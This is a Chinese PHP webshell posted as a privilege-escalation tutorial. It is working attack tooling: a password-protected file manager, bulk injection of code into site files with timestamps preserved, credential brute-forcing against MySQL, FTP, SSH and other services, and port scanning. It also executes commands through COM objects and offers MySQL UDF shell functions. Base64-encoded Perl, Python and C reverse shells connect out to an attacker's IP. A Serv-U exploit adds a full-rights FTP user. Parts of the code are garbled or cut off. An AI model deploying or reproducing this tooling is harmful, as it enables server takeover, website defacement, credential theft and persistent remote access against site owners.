【邪影教程】提权批php【邪影】
2015-10-29 05:41:22 -0400<?php $password = "hucxsz"; error_reporting(E_ERROR); set_time_limit(0); $lanip = getenv('REMOTE_ADDR'); function Root_GP(&$array) { while(list($key,$var) = each($array)) { if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv') { if(is_string($var)) $array[$key] = stripslashes($var); if(is_array($var)) $array[$key] = Root_GP($var); } } return $array; } function Root_CSS() { print<<<END
\nEND;
return false; } function File_Str($string) { return str_replace('//','/',str_replace('\','/',$string)); } function File_Size($size) { if($size > 1073741824) $size = round($size / 1073741824 100) / 100 . ' G'; elseif($size > 1048576) $size = round($size / 1048576 100) / 100 . ' M'; elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K'; else $size = $size . ' B'; return $size; } function File_Mode() { $RealPath = realpath('./'); $SelfPath = $_SERVER['PHP_SELF']; $SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/')); return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath))); } function File_Read($filename) { $handle = @fopen($filename,"rb"); $filecode = @fread($handle,@filesize($filename)); @fclose($handle); return $filecode; } function File_Write($filename,$filecode,$filemode) { $handle = @fopen($filename,$filemode); $key = @fwrite($handle,$filecode); if(!$key) { @chmod($filename,0666); $key = @fwrite($handle,$filecode); } @fclose($handle); return $key; } function File_Up($filea,$fileb) { $key = @copy($filea,$fileb) ? true : false; if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false; return $key; } function File_Down($filename) { if(!file_exists($filename)) return false; $filedown = basename($filename); $array = explode('.', $filedown); $arrayend = array_pop($array); header('Content-type: application/x-'.$arrayend); header('Content-Disposition: attachment; filename='.$filedown); header('Content-Length: '.filesize($filename)); @readfile($filename); exit; } function File_Deltree($deldir) { if(($mydir = @opendir($deldir)) == NULL) return false; while(false !== ($file = @readdir($mydir))) { $name = File_Str($deldir.'/'.$file); if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);rmdir($name);} if(is_file($name)){@chmod($name,0777);@unlink($name);} } @closedir($mydir); @chmod($deldir,0777); return @rmdir($deldir) ? true : false; } function File_Act($array,$actall,$inver) { if(($count = count($array)) == 0) return 'select file plz'; $i = 0; while($i < $count) { $array[$i] = urldecode($array[$i]); switch($actall) { case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制'; break; case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break; case "c" : if() return '错误属性值'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '改变属性'; break; case "d" : @touch($array[$i],strtotime($inver)); $msg = '改变时间'; break; } $i++; } return '选择文件 '.$msg.' 成功'; } function File_Edit($filepath,$filename,$dim = '') { $THIS_DIR = urlencode($filepath); $THIS_FILE = File_Str($filepath.'/'.$filename); if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));} else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';} print<<<END
search content:
END; } function File_a($p) { $MSG_BOX = '等待消息队列......'; if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/'; $UP_DIR = urlencode(File_Str($p.'/..')); $REAL_DIR = File_Str(realpath($p)); $FILE_DIR = File_Str(dirname(FILE)); $ROOT_DIR = File_Mode(); $THIS_DIR = urlencode(File_Str($p)); $UP_DIR = urlencode(File_Str(dirname($p))); $NUM_D = 0; $NUM_F = 0; if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '编辑文件 '.$_POST['pfn'].' success' : '编辑文件 '.$_POST['pfn'].' faild';@touch($_POST['pfn'],$intime);} if(!empty($_POST['ufs'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($p.'/'.$upfilename)) ? 'upfile '.$upfilename.' success' : 'upfile '.$upfilename.' ';} if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);} if(!empty($_GET['mn'])){$MSG_BOX = @rename(File_Str($p.'/'.$_GET['mn']),File_Str($p.'/'.$_GET['rn'])) ? '重命名 '.$_GET['mn'].' to '.$_GET['rn'].' success' : '重命名 '.$_GET['mn'].' to '.$_GET['rn'].' faild';} if(!empty($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($p.'/'.$_GET['dn']),0777) ? 'create folder '.$_GET['dn'].' success' : 'create folder '.$_GET['dn'].' faild';} if(!empty($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? '删除文件夹 '.$_GET['dd'].' 成功' : '删除文件夹 '.$_GET['dd'].' 失败';} if(!empty($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = 'the download file does not exists';} Root_CSS(); print<<<END
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<div class="actall" style="text-align:center;padding:3px;">
<form method="GET"><input type="hidden" name="s" value="a">
<input type="text" name="p" value="{$p}" style="width:50%;height:22px;">
<select onchange="location.href='?s=a&p='+options[selectedIndex].value">
<option>---特殊目录---</option>
<option value="{$ROOT_DIR}"> 站点根目录 </option>
<option value="{$FILE_DIR}"> 本程序目录 </option>
<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动"> 中文启动项目录 </option>
<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup"> 英文启动项目录 </option>
<option value="C:/RECYCLER"> RECYCLER </option>
<option value="C:/Program Files"> Program Files </option>
</select> <input class="bt" type="submit" value="转到"></form>
<div style="margin-top:3px;"></div>
<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
<input class="bt" type="button" value="创建文件" onclick="Inputok('newfile.php','?s=p&fp={$THIS_DIR}&fn=');">
<input class="bt" type="button" value="创建文件夹" onclick="Inputok('newdir','?s=a&p={$THIS_DIR}&dn=');">
<input type="file" name="ufp" style="width:30%;height:22px;">
<input type="text" name="ufn" style="width:20%;height:22px;">
<input class="bt" type="submit" name="ufs" value="上传">
</form>
</div>
<form method="POST" id="fileall" action="?s=a&p={$THIS_DIR}">
<table border="0"><tr>
<td class="toptd" style="width:810px;"> <a href="?s=a&p={$UP_DIR}"><b>上一级目录</b></a> </td>
<td class="toptd" style="width:100px;"> 操作 </td>
<td class="toptd" style="width:60px;"> 属性 </td>
<td class="toptd" style="width:200px;"> 修改时间 </td>
<td class="toptd" style="width:100px;"> 大小 </td></tr>END; if(($h_d = @opendir($p)) == NULL) return false; while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' or $Filename == '..') continue; $Filepath = File_Str($p.'/'.$Filename); if(is_dir($Filepath)) { $Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4); $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); $Filepath = urlencode($Filepath); echo "\n".'
文件夹({$NUM_D}) / 文件({$NUM_F})
END;
return true; } function Guama_Pass($length) { $possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; $str = ""; while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1); return $str; } function Guama_Auto($gp,$gt,$gl,$gc,$incode,$gk,$gd,$gb,$go) { if(($h_d = @opendir($gp)) == NULL) return false; if($go) { preg_match_all("/[-([^~]*?)-]/i",$gc,$nc); $passm = (int)$nc[1][0]; if(() || ($passm > 12)) return false; } while(false
)) { if($Filename == '.' || $Filename == '..') continue; if($gl != ''){if(eregi($gl,$Filename)) continue;} $Filepath = File_Str($gp.'/'.$Filename); if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$incode,$gk,$gd,$gb,$go); if(eregi($gt,$Filename)) { $ic = File_Read($Filepath); if(stristr($ic,$gk)) continue; if($go) $gc = str_replace($nc[0][0],Guama_Pass($passm),$gc); if($gd) $ftime = @filemtime($Filepath); if($incode == '1'){if(!stristr($ic,'')) continue; $ic = str_replace('',"\r\n".$gc."\r\n".''."\r\n",$ic); $ic = str_replace('',"\r\n".$gc."\r\n".''."\r\n",$ic);} if($incode == '2') $ic = $gc."\r\n".$ic; if($incode == '3') $ic = $ic."\r\n".$gc; echo File_Write($Filepath,$ic,'wb') ? 'ok:'.$Filepath.'
'."\r\n" : 'err:'.$Filepath.'
'."\r\n"; if($gd) @touch($Filepath,$ftime); ob_flush(); flush(); } } @closedir($h_d); return true; } function Guama_b() { if((!empty($_POST['gp'])) && (!empty($_POST['gt'])) && (!empty($_POST['gc']))) { $gk = ''; $go = false; $gt = str_replace('.','\.',$_POST['gt']); $gl = isset($_POST['gl']) ? str_replace('.','\.',$_POST['gl']) : ''; $gd = isset($_POST['gd']) ? true : false; $gb = ($_POST['gb'] == 'a') ? true : false; if(isset($_POST['gx'])){$gk = $_POST['gc'];if(stristr($_POST['gc'],'[-') && stristr($_POST['gc'],'-]')){$temp = explode('[-',$_POST['gc']); $gk = $temp[0]; $go = true;}} echo Guama_Auto($_POST['gp'],$gt,$gl,$_POST['gc'],$_POST['incode'],$gk,$gd,$gb,$go) ? '成功' : '失败'; echo '
'; return false; } $FILE_DIR = File_Str(dirname(FILE)); $ROOT_DIR = File_Mode(); print<<<END
END;
return true; } function Qingma_Auto($qp,$qt,$qc,$qd,$qb) { if(($h_d = @opendir($qp)) == NULL) return false; while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' || $Filename == '..') continue; $Filepath = File_Str($qp.'/'.$Filename); if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb); if(eregi($qt,$Filename)) { $ic = File_Read($Filepath); if(!stristr($ic,$qc)) continue; $ic = str_replace($qc,'',$ic); if($qd) $ftime = @filemtime($Filepath); echo File_Write($Filepath,$ic,'wb') ? 'ok:'.$Filepath.'
'."\r\n" : 'err:'.$Filepath.'
'."\r\n"; if($qd) @touch($Filepath,$ftime); ob_flush(); flush(); } } @closedir($h_d); return true; } function Qingma_c() { if((!empty($_POST['qp'])) && (!empty($_POST['qt'])) && (!empty($_POST['qc']))) { $qt = str_replace('.','\.',$_POST['qt']); $qd = isset($_POST['qd']) ? true : false; $qb = ($_POST['qb'] == 'a') ? true : false; echo Qingma_Auto($_POST['qp'],$qt,$_POST['qc'],$qd,$qb) ? '成功' : '失败'; echo '
'; return false; } $FILE_DIR = File_Str(dirname(FILE)); $ROOT_DIR = File_Mode(); print<<<END
END;
return true; } function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb) { if(($h_d = @opendir($tp)) == NULL) return false; while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' || $Filename == '..') continue; $Filepath = File_Str($tp.'/'.$Filename); if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb); $doing = false; if(eregi($tt,$Filename)) { $ic = File_Read($Filepath); if($th) { if(!stristr($ic,$tca)) continue; $ic = str_replace($tca,$tcb,$ic); $doing = true; } else { preg_match_all("/\'."\r\n" : 'err:'.$Filepath.'
'."\r\n"; if($td) @touch($Filepath,$ftime); ob_flush(); flush(); } } @closedir($h_d); return true; } function Tihuan_d() { if((!empty($_POST['tp'])) && (!empty($_POST['tt']))) { $tt = str_replace('.','\.',$_POST['tt']); $td = isset($_POST['td']) ? true : false; $tb = ($_POST['tb'] == 'a') ? true : false; $th = ($_POST['th'] == 'a') ? true : false; if($th) $_POST['tca'] = str_replace('.','\.',$_POST['tca']); echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? '成功' : '失败'; echo '
'; return false; } $FILE_DIR = File_Str(dirname(FILE)); $ROOT_DIR = File_Mode(); print<<<END
END;
return true; } function Antivirus_Auto($sp,$features,$st) { if(($h_d = @opendir($sp)) == NULL) return false; $ROOT_DIR = File_Mode(); while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' || $Filename == '..') continue; $Filepath = File_Str($sp.'/'.$Filename); if(is_dir($Filepath)) Antivirus_Auto($Filepath,$features,$st); if(eregi($st,$Filename)) { if($Filepath == File_Str(FILE)) continue; $ic = File_Read($Filepath); foreach($features as $var => $key) { if(stristr($ic,$key)) { $Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath); $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); echo ''.$Filepath.'
【编辑 删除】 '; echo '【'.$Filetime.'】 '.$var.'
'; break; } } ob_flush(); flush(); } } @closedir($h_d); return true; } function Antivirus_e() { if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo ' 删除成功';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? ' 删除成功' : ' 删除失败';} return false;} if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; } $SCAN_DIR = (File_Mode() == '') ? File_Str(dirname(FILE)) : File_Mode(); $features_php = array('ftp.class.php'=>'ftp.class.php','cha88.cn'=>'cha88.cn','Security Angel Team'=>'Security Angel Team','read()'=>'->read()','readdir'=>'readdir(','return string soname'=>'returns string soname','eval()'=>'eval(gzinflate(','eval(base64_decode())'=>'eval(base64_decode(','eval($_POST)'=>'eval($_POST','eval($_REQUEST)'=>'eval($REQUEST','eval ($)'=>'eval ($_','copy()'=>'copy($_FILES','copy ()'=>'copy ($_FILES','move_uploaded_file()'=>'move_uploaded_file($_FILES','move_uploaded_file ()'=>'move_uploaded_file ($_FILES','str_replace()'=>'str_replace(\'\\\',\'/\','); $features_asx = array('绝对路径'=>'绝对路径','输入马的内容'=>'输入马的内容','fso.createtextfile()'=>'fso.createtextfile(path,true)','<%execute(request())%>'=>'<%execute(request','<%eval request()%>'=>'<%eval request','execute session()'=>'execute session(','--Created!'=>'--Created!','WScript.Shell'=>'WScript.Shell','<%s LANGUAGE = VBScript.Encode %>'=>'<%@ LANGUAGE = VBScript.Encode %>','www.rootkit.net.cn'=>'www.rootkit.net.cn','Process.GetProcesses'=>'Process.GetProcesses','lake2'=>'lake2'); print<<<END
END; if(!empty($_POST['sp'])) { if($_POST['st'] == 'php'){$features_all = $features_php; $st = '\.php|\.inc|\.php4|\.php3|\._hp|\;';} if($_POST['st'] == 'asx'){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\.cdx|\;';} if($_POST['st'] == 'ppp'){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.php4|\.php3|\._hp|\.asp|\.asa|\.cer|\.cdx|\.aspx|\.ascx|\;';} echo Antivirus_Auto($_POST['sp'],$features_all,$st) ? '成功' : '失败'; } echo '
'."\r\n"; ob_flush(); flush(); } } else { $File_code = File_Read($Filepath); if(stristr($File_code,$sfc)) { echo ' '.$Filepath.'
'."\r\n"; ob_flush(); flush(); } } } @closedir($h_d); return true; } function Findfile_j() { if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo '删除成功';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? '删除成功' : '删除失败';} return false;} if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; } $SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode(); $SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config'; $SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip'; print<<
扫描路径
过滤文件
关键字串
搜索文件名
搜索包含关键字
将搜索应用于该文件夹,子文件夹和文件
仅将搜索应用于该文件夹
仅将搜索应用于该文件夹
END; if((!empty($_POST['sfp'])) && (!empty($_POST['sfc']))) { echo '
'; $_POST['sft'] = str_replace('.','\.',$_POST['sft']); $sff = ($_POST['sff'] == 'a') ? true : false; $sfb = ($_POST['sfb'] == 'a') ? true : false; echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '成功' : 'Error'; echo '
'; } return true; } function filecollect($dir,$filelist) { $files = ftp_nlist($conn,$dir); return $files; } function ftp_php(){ $dir = ""; $ftphost = isset($_POST['ftphost']) ? $_POST['ftphost'] : '127.0.0.1'; $ftpuser = isset($_POST['ftpuser']) ? $_POST['ftpuser'] : 'root'; $ftppass = isset($_POST['ftppass']) ? $_POST['ftppass'] : 'root'; $ftplist = isset($_POST['list']) ? $_POST['list'] : ''; $ftpfolder = isset($_POST['ftpfolder']) ? $_POST['ftpfolder'] : '/'; $ftpfolder = strtr($ftpfolder,"\","/"); $files = isset($_POST['readfile']) ? $_POST['readfile'] : ''; print<<<END
用PHP链接ftp服务
END; if(!empty($_POST['cmd'])) { $exe = @$shell->exec("$cmdpath /c ".$cmd); $out = $exe->StdOut(); $output = $out->ReadAll(); echo '
'.$output.''; } } elseif($object == 'application') { $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe'; $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\windows\php.ini c:\php.ini'; print<<
命令参数:
END; if(!empty($_POST['run'])) echo (@$shell->ShellExecute($run,'/c '.$cmd) == '0') ? '成功' : 'Faild'; } elseif($object == 'adodb') { $string = isset($_POST['string']) ? $_POST['string'] : ''; $sql = isset($_POST['sql']) ? $_POST['sql'] : ''; print<<
SQL命令:
END; if(!empty($string)) { @$shell->Open($string); $result = @$shell->Execute($sql); $count = $result->Fields->Count(); for($i=0;$i < $count;$i++){$Field[$i] = $result->Fields($i);} echo $result ? $sql.' 成功
' : $sql.' Faild
'; if(!empty($count)){while(!$result->EOF){for($i=0;$i < $count;$i++){echo $Field[$i]->value.'
';}@$result->MoveNext();}} $shell->Close(); } } $shell = NULL; echo '
END; if((!empty($_POST['ip'])) && (!empty($_POST['port']))) { $ports = explode('|',$_POST['port']); for($i = 0;$i < count($ports);$i++) { $fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,1); echo $fp ? '开放端口 ---> '.$ports[$i].'
' : '关闭端口 ---> '.$ports[$i].'
'; ob_flush(); flush(); } } echo '
XOR值:
编码 shellcode with XOR 解码 shellcode with XOR
END; return true; } function Crack_k() { $MSG_BOX = '等待消息队列......'; $ROOT_DIR = File_Mode(); $SORTS = explode('/',$ROOT_DIR); array_shift($SORTS); $PASS = join(',',$SORTS); for($i = 0;$i < 10;$i++){$n = (string)$i; $PASS .= $n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.$n.',';} if((!empty($_POST['address'])) && (!empty($_POST['user'])) && (!empty($_POST['pass']))) { $SORTPASS = explode(',',$_POST['pass']); $connect = false; $MSG_BOX = '没有发现'; for($k = 0;$k < count($SORTPASS);$k++) { if($_POST['class'] == 'mysql') $connect = @mysql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k])); if($_POST['class'] == 'ftp'){$Ftp_conn = @ftp_connect($_POST['address'],'21');$connect = @ftp_login($Ftp_conn,$_POST['user'],chop($SORTPASS[$k]));} if($_POST['class'] == 'mssql') $connect = @mssql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k])); if($_POST['class'] == 'pgsql') $connect = @pg_connect("host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop($SORTPASS[$k])}"); if($_POST['class'] == 'oracle') $connect = @oci_connect($_POST['user'],chop($SORTPASS[$k]),$_POST['address']); if($_POST['class'] == 'ssh'){$ssh_conn = @ssh2_connect($_POST['address'],'22');$connect = @ssh2_auth_password($ssh_conn,$_POST['user'],chop($SORTPASS[$k]));} if($connect) $MSG_BOX = '[project: '.$_POST['class'].'] [ip: '.$_POST['address'].'] [user: '.$_POST['user'].'] [pass: '.$SORTPASS[$k].']'; } } print<<<END
END;
return true; } function Linux_l() { echo '
'; print<<<END
END; if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) { if($_POST['use'] == 'perl') { $back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/b4che10r_pl',base64_decode($back_connect_pl),'wb') ? 'create /tmp/b4che10r_pl success
' : 'create /tmp/b4che10r_pl faild
'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; echo Exec_Run($perlpath.' /tmp/b4che10r_pl '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'execute command faild' : 'execute command successfully'; } if($_POST['use'] == 'python') { $back_connect_py="IyAtKi0gY29kaW5nOnV0Zi04IC0qLQ0KIyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoiIiINCmJhY2sgY29ubmVjdCBweSB2ZXJzaW9uLG9ubHkgbGludXggaGF2ZS". "BwdHkgbW9kdWxlDQoiIiINCmltcG9ydCBzeXMsb3Msc29ja2V0LHB0eQ0Kc2hlbGwgPSAiL2Jpbi9zaCINCmRlZiB1c2FnZShuYW1lKToNCiAgICBwcmludCAn". "cHl0aG9uIGNvbm5lY3QgYmFja2Rvb3InDQogICAgcHJpbnQgJ3VzYWdlOiAlcyA8aXBfYWRkcj4gPHBvcnQ+JyAlIG5hbWUNCg0KZGVmIG1haW4oKToNCiAgIC". "BpZiBsZW4oc3lzLmFyZ3YpICE9MzoNCiAgICAgICAgdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQogICAgICAgIHN5cy5leGl0KCkNCiAgICBzPXNvY2tldC5zb2NrZXQo". "c29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KICAgIHRyeToNCiAgICAgICAgcy5jb25uZWN0KChzeXMuYXJndlsxXSxpbnQoc3lzLmFyZ3ZbMl". "0pKSkNCiAgICAgICAgcHJpbnQgJ2Nvbm5lY3Qgb2snDQogICAgZXhjZXB0Og0KICAgICAgICBwcmludCAnY29ubmVjdCBmYWlsZCcNCiAgICAgICAgc3lzLmV4". "aXQoKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwyKQ0KICAgIG". "dsb2JhbCBzaGVsbA0KICAgIG9zLnVuc2V0ZW52KCdISVNURklMRScpDQogICAgb3MudW5zZXRlbnYoJ0hJU1RGSUxFU0laRScpDQogICAgcHR5LnNwYXduKHNo". "ZWxsKQ0KICAgIHMuY2xvc2UoKQ0KDQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOg0KICAgIG1haW4oKQ=="; echo File_Write('/tmp/b4che10r_py',base64_decode($back_connect_py),'wb') ? 'create /tmp/b4che10r_py success
' : 'create /tmp/b4che10r_py faild
'; $pypath = Exec_Run('which python'); $pypath = $pypath ? chop($pypath) : 'python'; echo Exec_Run($pypath.' /tmp/b4che10r_py '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'execute command faild' : 'execute command successfully'; } if($_POST['use'] == 'c') { $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/b4che10r_bc.c',base64_decode($back_connect_c),'wb') ? 'create /tmp/b4che10r_bc.c success
' : 'create /tmp/b4che10r_bc.c faild
'; $res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/b4che10r_bc.c'); echo Exec_Run('/tmp/b4che10r_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'execute command successfully' : 'execute command faild'; } echo '
local machine need run (nc -vv -l -p '.$_POST['yourport'].')'; } echo '
<div class="actall" style="width:625px;float: left;">
udf函数说明:<br />
    cmdshell 执行cmd;<br />
    downloader 下载者,到网上下载指定文件并保存到指定目录;<br />
    open3389 通用开3389终端服务,可指定端口(不改端口无需重启);<br />
    backshell 反弹Shell;<br />
    ProcessView 枚举系统进程;<br />
    KillProcess 终止指定进程;<br />
    regread 读注册表;<br />
    regwrite 写注册表;<br />
    shut 关机,注销,重启;<br />
    about 说明与帮助函数;</div>
<div class="actall" style="width:625;float: right;">
常用命令:<br />    create function cmdshell returns string soname 'moonudf.dll'
    select cmdshell('命令')
    select backshell('你的ip',12345)
    nc -l -p 12345
END;
return true; } function phpsocket() { @set_time_limit(0); $system=strtoupper(substr(PHP_OS, 0, 3)); if(!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or die("Can't load socket"); }else{ @dl('sockets.so') or die("Can't load socket"); } } if(isset($_POST['host']) && isset($_POST['port'])) { $host = $_POST['host']; $port = $_POST['port']; }else{ print<<<eof
反弹 cmdshell 用 php socket;
END;
} echo ''; if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass']))) { echo '反弹 cmdshell 用 php socket;
扩展项 php_sockets 应该被开启;
请检查 phpinfo();
code by Maple-X
'; $sendbuf = ""; $recvbuf = ""; $domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n"; $adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n". "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n". "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n"; $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n"; $sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10); $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
